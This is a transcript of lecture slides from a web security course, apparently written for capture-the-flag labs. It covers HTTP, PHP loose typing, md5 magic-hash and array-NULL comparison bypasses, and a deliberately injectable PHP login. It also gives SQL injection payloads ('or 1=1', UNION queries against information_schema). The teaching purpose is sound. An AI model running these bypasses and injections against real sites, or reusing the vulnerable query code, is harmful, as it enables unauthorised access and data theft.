IM620 Web Security

Transcript

1. IM620 Web Security

2. Basic PHP

3. • 動態網⾴開發語⾔ • 執⾏在 Server 上⾯，並將結果傳⾄客⼾端 • Example: • Wordpress

   • Facebook • CDX Basic PHP

4. • 變數 • 名字前面都會需要加一個 $ • HTTP GET / POST

   • $_GET • $_POST • Arrays Basic PHP

5. HTTP HyperText Transfer Protocol

6. •HTTP 具有無狀態特性 •通常使用 TCP 協定 •訂定八種請求方式 •訂有回傳狀態碼 •歷史版本 •HTTP 1.0

   •HTTP 1.1 •HTTP 2.0 HTTP

7. HTTP 標頭

8. HTTP Header (Request) GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0

   (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 HTTP Method 請求方式

9. HTTP Header (Request) Request Path 資源位置 GET / HTTP/1.1 Host:

   racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

10. HTTP Header (Request) HTTP 協定版本 1.1 1.2 2 GET /

    HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

11. HTTP Header (Request) 存取網站域名 (domain/IP + port) GET / HTTP/1.1

    Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

12. HTTP Header (Request) ⽤於辨別作業系統和客⼾端(瀏覽器) GET / HTTP/1.1 Host: racterub.me User-Agent:

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1

13. HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun,

    27 Sep 2020 10 : 44 : 42 GMT Content-Type: text/html; charset=utf-8 Last-Modif i ed: Tue, 04 Aug 2020 16 : 24 : 02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 <!DOCTYPE HTML> . . . Status Code

14. HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun,

    27 Sep 2020 10 : 44 : 42 GMT Content-Type: text/html; charset=utf-8 Last-Modif i ed: Tue, 04 Aug 2020 16 : 24 : 02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 <!DOCTYPE HTML> . . . Response Header

15. HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun,

    27 Sep 2020 10 : 44 : 42 GMT Content-Type: text/html; charset=utf-8 Last-Modif i ed: Tue, 04 Aug 2020 16 : 24 : 02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 <!DOCTYPE HTML> . . . ⽂本內容

16. •GET: 向指定的資源發出顯示請求 HTTP Method

17. •GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 HTTP Method 提交的資料

18. •GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 •OPTIONS: 這個方法可使伺服器傳回該資源所支援的所有 HTTP請求方法 HTTP Method

19. •GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 •OPTIONS: 這個方法可使伺服器傳回該資源所支援的所有HTTP請求方 法 •HEAD: 和 GET

    雷同，但不回傳文本內容 •PUT: 向指定資源位置上傳其最新內容 •DELETE: 請求伺服器刪除Request-URI所標識的資源 •CONNECT: 預留給能夠將連接改為隧道方式的代理伺服器。(HTTP 1.1) •TRACE: 回顯伺服器收到的請求，主要用於測試或診斷 HTTP Method

20. • 200 : 成功 • 300 : 轉址 • 400

    : ⽤⼾端錯誤 • 500 : 伺服端錯誤 HTTP 狀態碼

21. URL Uniform Resource Locator

22. URL scheme://User@Domain:Port/Path?Query#Fragment

23. URL scheme://User@Domain:Port/Path?Query#Fragment https://[email protected]:443/shell?cmd=ls#output

24. Ports

25. • 定義在 TCP/IP 裡⾯ • Port 範圍在 1 ~ 65535

    • 在 IANA 有定義⼀些 Port 的⽤途
 (但是 User 可以⾃訂) Ports

26. • 21: FTP • 22: SSH • 23: Telnet •

    80: HTTP • 443: HTTPS • 3306: MySQL • 3389: RDP Ports

27. • GET / POST data • ?a=1&b=2 • $_GET •

    $a = 1 • $b = 2 Basic PHP

28. • GET / POST data • ?a=1&b=2 • $_POST •

    $a = 1 • $b = 2 Basic PHP

29. • GET / POST data •?a[]=1&a[]=2&a[]=3 • $_GET • $a

    = Array(1,2,3) Basic PHP

30. • GET / POST data • a[]=1&a[]=2&a[]=3 • $_POST •

    $a = Array(1,2,3) Basic PHP

31. Lab Basic PHP

32. • 弱型別 • '87' == 87 ? Basic PHP

33. • 弱型別 • '87' == 87 ? • True •

    '1e5' == 100e3 ? Basic PHP

34. • 弱型別 • '87' == 87 ? • True •

    '1e5' == 100e3 ? • True • NULL == 0 == False ? Basic PHP

35. • 弱型別 • '87' == 87 ? • True •

    '1e5' == 100e3 ? • True • NULL == 0 == False ? • True Basic PHP

36. • 弱型別 • '123' + '456' ? Basic PHP

37. • 弱型別 • '123' + '456' ? • '579' •

    '123' . '456'？ Basic PHP

38. • 弱型別 • '123' + '456' ? • '579' •

    '123' . '456'？ • '123456' Basic PHP

39. Basic PHP

40. Basic PHP

41. Basic PHP

42. • Example: Basic PHP <?php if ($a != $b) {

    if (md5($a) == md5($b)){ echo $flag; } }

43. • Example: Basic PHP <?php if ($a != $b) {

    if (md5($a) == md5($b)){ echo $flag; } } $a = QNKCDZO $b = s878926199a

44. • Example: Basic PHP <?php if ($a != $b) {

    if (md5($a) == md5($b)){ echo $flag; } } $a = QNKCDZO $b = s878926199a md5() 0e830400451993494058024219903391 0e545993274517709034328855841020

45. Basic PHP

46. 啊現在的 PHP 都會改 用 === 跟 !== 了啊

47. 但是 PHP 還有一個潮 潮的酷東東

48. • md5([]) Array 🌚

49. • md5([]) • NULL • strcmp([], []) Array 🌚

50. • md5([]) • NULL • strcmp([], []) • NULL •

    sha1([]) Array 🌚

51. • md5([]) • NULL • strcmp([], []) • NULL •

    sha1([]) • NULL Array 🌚

52. • Example: Array 🌚 <?php if ($a !== $b) {

    if (md5($a) === md5($b)){ echo $flag; } } $a = [1] $b = [2]

53. • Example: Array 🌚 <?php if ($a !== $b) {

    if (md5($a) === md5($b)){ echo $flag; } } $a = [1] $b = [2] md5() NULL NULL

54. Array 🌚

55. Array 🌚

56. Lab PHP sucks

57. SQL Injection

58. SQL id username password 1 test test 2 admin 1234

    3 yzu yz1234 4 itac itac id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac Login users admins

59. SQL id username password 1 test test 2 admin 1234

    3 yzu yz1234 4 itac itac

60. SQL SELECT * FROM users ; id username password 1

    test test 2 admin 1234 3 yzu yz1234 4 itac itac

61. SQL SELECT * FROM users WHERE username='admin' ; id username

    password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

62. SQL SELECT id, password FROM users WHERE username='admin' ; id

    username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

63. SQL SELECT * FROM users LIMIT 0,1; id username password

    1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

64. SQL SELECT * FROM users LIMIT 1,3; id username password

    1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

65. SQL injection if (isset($_GET['user']) || isset($_GET['pass'])) { $sql = "SELECT

    id FROM user WHERE username='". $_GET['user']."' AND password='".$_GET['pass']."'"; $result = $connection->query($sql); if ($result) { $data = $result->fetch(PDO::FETCH_ASSOC); if ($data) { die("success"); } else { die(“failed"); } } else { die("error"); } }

66. SQL injection if (isset($_GET['user']) || isset($_GET['pass'])) { $sql = "SELECT

    id FROM user WHERE username='". $_GET['user']."' AND password='".$_GET['pass']."'"; $result = $connection->query($sql); if ($result) { $data = $result->fetch(PDO::FETCH_ASSOC); if ($data) { die("success"); } else { die(“failed"); } } else { die("error"); } }

67. SQL injection SELECT id FROM user WHERE username='".$_GET['user']."' AND password='".$_GET['pass']."'";

68. SQL injection SELECT id FROM user WHERE username='admin' AND password='admin';

    user = admin pass = admin

69. SQL injection SELECT id FROM user WHERE username=‘admin’;’ AND password='admin';

    user = admin’; pass = admin

70. SQL injection SELECT id FROM user WHERE username='' or 1=1

    -- ' AND password='admin'; user = ' or 1=1 --+ pass = admin

71. 所以 SQL injection 通常出 現在 SQL 語法拼接作查詢

72. Lab Web3 Login as admin

73. • Union-based • 做合併查詢，可以替換掉原本要查詢的位置，在網頁取 得你構造的 SQL 語法所拿的資料 • Boolean-based •

    當你在猜字時，可以透過 ASCII 來比較，用 True / False 撈資料 • Time-based • 可以使用 Boolean-based 的方式然後在多去 sleep 一下 SQL injection 種類

74. SQL SELECT * FROM users WHERE id=1; id username password

    1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

75. SQL SELECT * FROM users WHERE id=1 UNION SELECT 1,2,3;

    id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac 1 2 3

76. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,2,3;

    id username password 1 2 3

77. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,user(),3;

    id username password 1 root@localhost 3

78. • information_schema MySQL

79. • information_schema • 存有資料庫的中繼資料 MySQL

80. • information_schema • 存有資料庫的中繼資料 • Database Name • Table Name

    • Column Name MySQL

81. • Database Name • information_schema.schemata • Table Name • information_schema.tables

    • Column Name • information_schema.columns MySQL

82. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,schema_name,3

    FROM information_schema.schemata; id username password 1 login 3

83. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,table_name,3

    FROM information_schema.tables WHERE table_schema='login'; id username password 1 users 3

84. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3

    FROM information_schema.columns WHERE table_name='users'; id username password 1 id 3

85. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3

    FROM information_schema.columns WHERE table_name='users' limit 1,1; id username password 1 username 3

86. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,group_concat(column_name),3

    FROM information_schema.columns WHERE table_name='users'; id username password 1 id, user, pass 3

87. Lab Web3 Blog

88. Bonus Web Login as admin - advanced

89. Bonus Web 🐚 🐚 🐚 🐚